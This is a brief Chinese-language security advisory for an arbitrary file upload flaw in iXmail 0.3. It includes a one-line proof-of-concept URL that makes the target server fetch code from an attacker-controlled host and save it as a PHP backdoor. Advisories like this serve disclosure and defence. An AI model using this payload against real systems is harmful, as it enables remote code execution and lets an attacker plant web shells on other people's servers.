iXmail任意文件可上传漏洞发布时间:2003-06-26 更新时间:2003-06-25 严重程度:高 威胁程度:本地管理员权限 错误类型:输入验证错误 利用方式:服务器模式 BUGTRAQ ID:8048 受影响系统 a-suivre.net iXmail 0.3详细描述 iXmail存在任意文件上传漏洞。问题是由于对用户提交的URI参数缺少充分过滤,攻击者操作URI可以提交类似PHP的文件,如果PHP文件中包含恶意代码,就导致以WEB权限执行。 上传的文章将存在WEB目录下的/tmp目录下。 测试代码 http://[target]/ixmail_attach.php?submit=1&attach1=http://[attacker]/badcode.txt&attach1_name=backdoor.php 解决方案 尚无 相关信息 leseulfrog@hotmail.com 参考:http://www.frog-man.org/tutos/iXmail.txt 相关主页:http://www.a-suivre.net/ |
